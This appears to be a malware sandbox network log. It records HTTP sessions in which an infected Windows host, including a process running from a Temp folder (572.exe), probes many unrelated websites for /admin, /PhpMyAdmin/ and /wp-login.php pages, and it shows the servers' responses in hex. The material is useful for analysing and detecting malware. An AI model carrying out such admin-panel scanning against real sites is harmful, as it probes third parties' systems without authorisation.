                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.088239908 CET119INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                536192.168.2.649571185.51.191.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.231431007 CET181OUTGET /admin/w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.524139881 CET1286INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=ba0ae7db91a15a20c859a36e9617e7c7; expires=Tue, 06-Feb-2024 11:16:11 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:16:11 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/w/login
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 64 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 79 73 74 65 6d 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6c 61 67 73 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6c 65 61 72 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1d57<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http-equiv="Content-Type" content="text/ht
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.524158955 CET1286INData Raw: 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ml; charset=UTF-8" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/admin.css?v=1707131771" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/_custom_admin.css?v=1707131771" />...<link rel="s
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.524262905 CET1286INData Raw: 64 72 61 67 67 61 62 6c 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6a 71
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: draggable.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.button.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.dialog.min.js"></script><script type="text/javascript" src="/js
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.524281025 CET1286INData Raw: 6b 65 64 69 74 6f 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 63 6b 66 69 6e 64 65 72 5f 5f 5f 33 2f 63 6b 66 69 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: keditor.js"></script><script type="text/javascript" src="/js/ckfinder___3/ckfinder.js"></script><link rel="stylesheet" href="/js/jquery/timepicker/jquery-clockpicker.min.css"><script type="text/javascript" src="/js/jquery/timepicker/j
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.524297953 CET1286INData Raw: 61 72 65 61 2e 63 6b 65 64 69 74 6f 72 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 09 09 09 76 61 72 20 63 6b 69 64 3d 24 28 74 68 69 73 29 2e 61 74 74 72 28 27 69 64 27 29 3b 0d 0a 09 09 09 69 66 28 63 6b 69 64 3d 3d 27 27 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: area.ckeditor').each(function(){var ckid=$(this).attr('id');if(ckid=='' || typeof ckid==='undefined'){ckid="ck"+Math.random().toString(36).substring(7);$(this).attr('id',ckid);}var editor = CKEDITOR.replace( cki
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.524316072 CET1286INData Raw: 2f 61 3e 3c 64 69 76 20 69 64 3d 22 61 64 6d 69 6e 5f 73 69 64 65 74 69 74 6c 65 22 3e 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 61 64 6d 69 6e 5f 73 69 64 65 74 69 74 6c 65 5f 72 69 67 68 74 22 3e 0d 0a 3c 73 65 6c 65 63 74 20 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /a><div id="admin_sidetitle"></div><div id="admin_sidetitle_right"><select name="admin_language" class="admin_language" onChange="document.location.href='/admin/w/language/'+this.value;"><option value="hu" >Magyar</option><option
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.524331093 CET386INData Raw: 74 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t;});</script></div></div><div class="clear"></div><div id="footer"><footer><div id="help_footer"></div><br><br><br><br><br><br><br><br><br></footer></div><div class="clear"></div></div></div><div class="
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.530353069 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                537192.168.2.649692172.203.148.3480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.379749060 CET180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: eei.uniandes.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.494517088 CET155INHTTP/1.1 302 Found : Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://eei.uniandes.edu.co/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                538192.168.2.64973564.91.249.2080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.430047989 CET167OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.912926912 CET351INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: http://ww12.chainmine.io/admin?usid=27&utid=4923818255
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                539192.168.2.649716103.224.182.210804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.433847904 CET174OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.601926088 CET342INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: __tad=1707131772.2346661; expires=Thu, 02-Feb-2034 11:16:12 GMT; Max-Age=315360000
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/admin?sub1=20240205-2216-12ca-876d-f5344b7b6169
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                540192.168.2.649688178.16.128.18180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.459465027 CET173OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mobilsam.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.653604031 CET1016INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 707
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://mobilsam.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                platform: hostinger
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                541192.168.2.649717185.120.71.2680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.494699955 CET178OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.703715086 CET383INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.analvids.com/wp-login.php
